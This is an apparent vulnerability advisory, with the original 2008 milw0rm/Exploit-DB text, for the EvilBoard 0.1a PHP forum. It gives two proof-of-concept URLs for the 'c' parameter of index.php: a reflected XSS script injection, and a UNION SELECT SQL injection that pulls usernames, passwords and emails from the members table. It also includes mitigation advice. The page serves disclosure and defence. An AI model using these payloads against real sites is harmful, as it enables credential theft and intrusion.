EvilBoard 0.1a (Alpha) Multiple Remote Vulnerabilities

vendor:

EvilBoard

by:

seaofglass

9.3

CVSS

HIGH

XSS & Remote Sql Injection

79 (XSS) & 89 (SQL Injection)

CWE

Product Name: EvilBoard

Affected Version From: 0.1a

Affected Version To: 0.1a

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

EvilBoard 0.1a (Alpha) Multiple Remote Vulnerabilities

EvilBoard is vulnerable to XSS and Remote SQL Injection. An attacker can exploit this vulnerability by sending a malicious payload in the 'c' parameter of the index.php page. This payload can be used to execute arbitrary JavaScript code in the context of the user's browser or to inject malicious SQL commands into the database.

Mitigation:

Input validation should be used to prevent XSS and SQL Injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

#####################################################################
##
##  Title: EvilBoard 0.1a (Alpha) Multiple Remote Vulnerabilities
##  Author: seaofglass, <seaofglass[at]korea.com>
##  Download: http://sourceforge.net/projects/evilboard
##  Bug: XSS & Remote Sql Injection
##  Info: EvilBoard is using PHP and mysql.
##  MySite: http://seaofglass.backrush.com
##
#####################################################################

# bug 1  : XSS

# PoC
http://host/EvilBoard_0.1a/index.php?c='><script>alert('hi');</script>


# bug 2 : Remote SQL Injection

# PoC
http://host/EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username,char(77),password,char(77),email_address,char(77),info,char(77),user_level,char(77))/**/from/**/eb_members/**/where/**/userid=1/*

# thanks
vangelis, AmesianX

# milw0rm.com [2008-01-08]